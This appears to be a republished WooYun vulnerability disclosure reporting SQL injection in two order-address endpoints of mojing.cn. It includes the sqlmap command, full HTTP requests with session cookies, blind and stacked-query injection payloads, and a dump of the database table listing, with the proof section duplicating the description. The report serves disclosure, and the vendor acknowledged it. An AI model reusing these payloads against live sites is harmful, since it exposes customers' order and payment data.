暴风魔镜多出SQL注入泄露大量订单信息会员信息

admin
admin
admin
139701
文章
114
评论
2017年4月29日02:10:18评论270 views字数 215阅读0分43秒阅读模式
摘要

2016-05-04: 细节已通知厂商并且等待厂商处理中
2016-05-04: 厂商已经确认,细节仅向厂商公开
2016-05-14: 细节向核心白帽子及相关领域专家公开
2016-05-24: 细节向普通白帽子公开
2016-06-03: 细节向实习白帽子公开
2016-06-18: 细节向公众公开

漏洞概要 关注数(5) 关注此漏洞

缺陷编号: WooYun-2016-204847

漏洞标题: 暴风魔镜多出SQL注入泄露大量订单信息会员信息

相关厂商: mojing.cn

漏洞作者: 黑色键盘丶

提交时间: 2016-05-04 11:55

公开时间: 2016-06-18 12:00

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 注射技巧

1人收藏

漏洞详情

披露状态:

2016-05-04: 细节已通知厂商并且等待厂商处理中
2016-05-04: 厂商已经确认,细节仅向厂商公开
2016-05-14: 细节向核心白帽子及相关领域专家公开
2016-05-24: 细节向普通白帽子公开
2016-06-03: 细节向实习白帽子公开
2016-06-18: 细节向公众公开

简要描述:

RT 厂商大哥

详细说明:

code 区域 
两处post注入语法:sqlmap.py -r 1.txt --dbs
 ---------------------------post数据包-----------------------------  注入参数address_id 
 POST /order/user/myaddressdelete HTTP/1.1
 Host: www.mojing.cn
 Proxy-Connection: keep-alive
 Content-Length: 69
 Origin: http://www.mojing.cn
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
 Content-Type: application/x-www-form-urlencoded
 Accept: */*
 Referer: http://www.mojing.cn/order/user/myaddress
 Accept-Encoding: gzip,deflate
 Accept-Language: zh-CN,zh;q=0.8
 Cookie: user_regist_plat=2; pi=3966367904827989; piv=b68fcaa79d56829d608e84397eb2c41b; PHPSESSID=d6i7vdovv9c9agun1n9g6p9vj7; rf_f=http%3A%2F%2Ftools.phpinfo.me%2Fdomain%2F; nTalk_CACHE_DATA={uid:kf_9686_ISME9754_3966367904827989,tid:1461333571118043}; NTKF_T2D_CLIENTID=guest5B5D7286-B43B-47B2-362E-32AD63DC61C9; _yd_=GA1.2.1561271614.1461333586; Hm_lvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461150226,1461151868,1461333571,1461341340; Hm_lpvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461341385; __visitid=d90fd5493a3d98c48a400498dbd94634#177
 
 address_id=49152&is_order_page=is_myaddress_page&dis_address_id=49152
 
 =====================================================================
 Parameter: address_id (POST)
     Type: boolean-based blind
     Title: MySQL >= 5.0 boolean-based blind - Parameter replace
     Payload: address_id=(SELECT (CASE WHEN (8966=8966) THEN 8966 ELSE 8966*(SELE
 CT 8966 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&is_order_page=is_myaddress
 _page&dis_address_id=49152
 ---
 
 另外一处
 ------------------------post数据包------------------------------------- 注入参数address_id_e
 POST /order/user/myaddressedit HTTP/1.1
 Host: www.mojing.cn
 Proxy-Connection: keep-alive
 Content-Length: 386
 Origin: http://www.mojing.cn
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
 Content-Type: application/x-www-form-urlencoded
 Accept: */*
 Referer: http://www.mojing.cn/order/user/myaddress
 Accept-Encoding: gzip,deflate
 Accept-Language: zh-CN,zh;q=0.8
 Cookie: user_regist_plat=2; pi=3966367904827989; piv=b68fcaa79d56829d608e84397eb2c41b; PHPSESSID=d6i7vdovv9c9agun1n9g6p9vj7; rf_f=http%3A%2F%2Ftools.phpinfo.me%2Fdomain%2F; nTalk_CACHE_DATA={uid:kf_9686_ISME9754_3966367904827989,tid:1461333571118043}; NTKF_T2D_CLIENTID=guest5B5D7286-B43B-47B2-362E-32AD63DC61C9; _yd_=GA1.2.1561271614.1461333586; Hm_lvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461150226,1461151868,1461333571,1461341340; Hm_lpvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461341385; __visitid=d90fd5493a3d98c48a400498dbd94634#177
 
 address_link_province_id_e=110000&address_link_province_name_e=北京市&address_link_city_id_e=130400&address_link_city_name_e=邯郸市&address_link_area_id_e=130401&address_link_area_name_e=市辖区&address_link_name_e=黑色键盘&address_link_mobile_e=13655578555&address_link_mobile_back_e=13655578555&address_link_detail_e=111111111&address_id_e=49152&address_link_code_e=111111
 ===============================================================
 Parameter: address_id_e (POST)
     Type: stacked queries
     Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
     Payload: address_link_province_id_e=110000&address_link_province_name_e=????
 ?????&address_link_city_id_e=130400&address_link_city_name_e=é??é?????&address_l
 ink_area_id_e=130401&address_link_area_name_e=???è?????&address_link_name_e=é??è
 ??é?????&address_link_mobile_e=13655578555&address_link_mobile_back_e=1365557855
 5&address_link_detail_e=111111111&address_id_e=49152;(SELECT * FROM (SELECT(SLEE
 P(5)))ArXO)#&address_link_code_e=111111
 ---

数据库信息

code 区域 
available databases [2]:
 [*] information_schema
 [*] shop

商品表信息

code 区域 
Database: shop
 +---------------------------+---------+
 | Table                     | Entries |
 +---------------------------+---------+
 | sms_send_log              | 1740521 |
 | financial_alipay_log      | 260480  |
 | order_history             | 144861  |
 | goods_booking_info        | 83855   |
 | order_goods               | 51689   |
 | order_address             | 50871   |
 | order_express             | 50871   |
 | order_invoice             | 50871   |
 | order_info                | 50773   |
 | weidian_user              | 46435   |
 | weidian_usersub           | 46381   |
 | userid                    | 39879   |
 | order_cart                | 36996   |
 | data_sale                 | 36316   |
 | order_paylog              | 36042   |
 | weidian_usershare         | 29982   |
 | pic_center_picture        | 19622   |
 | order_ready               | 11500   |
 | edb_order                 | 6022    |
 | activity_user_log         | 3816    |
 | order_refund              | 3186    |
 | basic_area                | 3152    |
 | order_return              | 1833    |
 | weidian_useraddress       | 642     |
 | static_file               | 571     |
 | goods_act_stats           | 365     |
 | edb_order_refund          | 351     |
 | basic_city                | 345     |
 | user_info                 | 304     |
 | order_barter_address      | 274     |
 | goods_picture_mapping     | 263     |
 | order_barter              | 255     |
 | basic_freight             | 186     |
 | goods_picture_mapping0115 | 174     |
 | admin_menu                | 157     |
 | goods_picture             | 108     |
 | weidian_usersub_mirror    | 108     |
 | order_action              | 67      |
 | goods                     | 46      |
 | admin_user                | 37      |
 | basic_province            | 31      |
 | goods_booking             | 29      |
 | goods0115                 | 27      |
 | basic_express             | 25      |
 | activity_purchase         | 19      |
 | goods_property            | 19      |
 | goods_attr                | 17      |
 | goods_property_h5         | 17      |
 | admin_group               | 16      |
 | goods_h5                  | 16      |
 | order_activity            | 16      |
 | goods_property0115        | 14      |
 | cms_nav                   | 7       |
 | basic_freight_plan        | 6       |
 | goods_gift_activity       | 6       |
 | mcode_log                 | 6       |
 | cms_activity              | 5       |
 | cms_evaluate              | 5       |
 | cms_masscontent           | 4       |
 | cms_masstype              | 4       |
 | cms_hotsale               | 3       |
 | cms_video                 | 3       |
 | activity_order            | 2       |
 | financial_account         | 2       |
 | crontab_list              | 1       |
 +---------------------------+---------+

信息就不跑咯

漏洞证明:

code 区域 
两处post注入语法:sqlmap.py -r 1.txt --dbs
 ---------------------------post数据包-----------------------------  注入参数address_id 
 POST /order/user/myaddressdelete HTTP/1.1
 Host: www.mojing.cn
 Proxy-Connection: keep-alive
 Content-Length: 69
 Origin: http://www.mojing.cn
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
 Content-Type: application/x-www-form-urlencoded
 Accept: */*
 Referer: http://www.mojing.cn/order/user/myaddress
 Accept-Encoding: gzip,deflate
 Accept-Language: zh-CN,zh;q=0.8
 Cookie: user_regist_plat=2; pi=3966367904827989; piv=b68fcaa79d56829d608e84397eb2c41b; PHPSESSID=d6i7vdovv9c9agun1n9g6p9vj7; rf_f=http%3A%2F%2Ftools.phpinfo.me%2Fdomain%2F; nTalk_CACHE_DATA={uid:kf_9686_ISME9754_3966367904827989,tid:1461333571118043}; NTKF_T2D_CLIENTID=guest5B5D7286-B43B-47B2-362E-32AD63DC61C9; _yd_=GA1.2.1561271614.1461333586; Hm_lvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461150226,1461151868,1461333571,1461341340; Hm_lpvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461341385; __visitid=d90fd5493a3d98c48a400498dbd94634#177
 
 address_id=49152&is_order_page=is_myaddress_page&dis_address_id=49152
 
 =====================================================================
 Parameter: address_id (POST)
     Type: boolean-based blind
     Title: MySQL >= 5.0 boolean-based blind - Parameter replace
     Payload: address_id=(SELECT (CASE WHEN (8966=8966) THEN 8966 ELSE 8966*(SELE
 CT 8966 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&is_order_page=is_myaddress
 _page&dis_address_id=49152
 ---
 
 另外一处
 ------------------------post数据包------------------------------------- 注入参数address_id_e
 POST /order/user/myaddressedit HTTP/1.1
 Host: www.mojing.cn
 Proxy-Connection: keep-alive
 Content-Length: 386
 Origin: http://www.mojing.cn
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
 Content-Type: application/x-www-form-urlencoded
 Accept: */*
 Referer: http://www.mojing.cn/order/user/myaddress
 Accept-Encoding: gzip,deflate
 Accept-Language: zh-CN,zh;q=0.8
 Cookie: user_regist_plat=2; pi=3966367904827989; piv=b68fcaa79d56829d608e84397eb2c41b; PHPSESSID=d6i7vdovv9c9agun1n9g6p9vj7; rf_f=http%3A%2F%2Ftools.phpinfo.me%2Fdomain%2F; nTalk_CACHE_DATA={uid:kf_9686_ISME9754_3966367904827989,tid:1461333571118043}; NTKF_T2D_CLIENTID=guest5B5D7286-B43B-47B2-362E-32AD63DC61C9; _yd_=GA1.2.1561271614.1461333586; Hm_lvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461150226,1461151868,1461333571,1461341340; Hm_lpvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461341385; __visitid=d90fd5493a3d98c48a400498dbd94634#177
 
 address_link_province_id_e=110000&address_link_province_name_e=北京市&address_link_city_id_e=130400&address_link_city_name_e=邯郸市&address_link_area_id_e=130401&address_link_area_name_e=市辖区&address_link_name_e=黑色键盘&address_link_mobile_e=13655578555&address_link_mobile_back_e=13655578555&address_link_detail_e=111111111&address_id_e=49152&address_link_code_e=111111
 ===============================================================
 Parameter: address_id_e (POST)
     Type: stacked queries
     Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
     Payload: address_link_province_id_e=110000&address_link_province_name_e=????
 ?????&address_link_city_id_e=130400&address_link_city_name_e=é??é?????&address_l
 ink_area_id_e=130401&address_link_area_name_e=???è?????&address_link_name_e=é??è
 ??é?????&address_link_mobile_e=13655578555&address_link_mobile_back_e=1365557855
 5&address_link_detail_e=111111111&address_id_e=49152;(SELECT * FROM (SELECT(SLEE
 P(5)))ArXO)#&address_link_code_e=111111
 ---

数据库信息

code 区域 
available databases [2]:
 [*] information_schema
 [*] shop

商品表信息

code 区域 
Database: shop
 +---------------------------+---------+
 | Table                     | Entries |
 +---------------------------+---------+
 | sms_send_log              | 1740521 |
 | financial_alipay_log      | 260480  |
 | order_history             | 144861  |
 | goods_booking_info        | 83855   |
 | order_goods               | 51689   |
 | order_address             | 50871   |
 | order_express             | 50871   |
 | order_invoice             | 50871   |
 | order_info                | 50773   |
 | weidian_user              | 46435   |
 | weidian_usersub           | 46381   |
 | userid                    | 39879   |
 | order_cart                | 36996   |
 | data_sale                 | 36316   |
 | order_paylog              | 36042   |
 | weidian_usershare         | 29982   |
 | pic_center_picture        | 19622   |
 | order_ready               | 11500   |
 | edb_order                 | 6022    |
 | activity_user_log         | 3816    |
 | order_refund              | 3186    |
 | basic_area                | 3152    |
 | order_return              | 1833    |
 | weidian_useraddress       | 642     |
 | static_file               | 571     |
 | goods_act_stats           | 365     |
 | edb_order_refund          | 351     |
 | basic_city                | 345     |
 | user_info                 | 304     |
 | order_barter_address      | 274     |
 | goods_picture_mapping     | 263     |
 | order_barter              | 255     |
 | basic_freight             | 186     |
 | goods_picture_mapping0115 | 174     |
 | admin_menu                | 157     |
 | goods_picture             | 108     |
 | weidian_usersub_mirror    | 108     |
 | order_action              | 67      |
 | goods                     | 46      |
 | admin_user                | 37      |
 | basic_province            | 31      |
 | goods_booking             | 29      |
 | goods0115                 | 27      |
 | basic_express             | 25      |
 | activity_purchase         | 19      |
 | goods_property            | 19      |
 | goods_attr                | 17      |
 | goods_property_h5         | 17      |
 | admin_group               | 16      |
 | goods_h5                  | 16      |
 | order_activity            | 16      |
 | goods_property0115        | 14      |
 | cms_nav                   | 7       |
 | basic_freight_plan        | 6       |
 | goods_gift_activity       | 6       |
 | mcode_log                 | 6       |
 | cms_activity              | 5       |
 | cms_evaluate              | 5       |
 | cms_masscontent           | 4       |
 | cms_masstype              | 4       |
 | cms_hotsale               | 3       |
 | cms_video                 | 3       |
 | activity_order            | 2       |
 | financial_account         | 2       |
 | crontab_list              | 1       |
 +---------------------------+---------+

信息就不跑咯

修复方案:

过滤啦

版权声明:转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-05-04 11:58

厂商回复:

感谢您提交的漏洞,我们会尽快修复。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin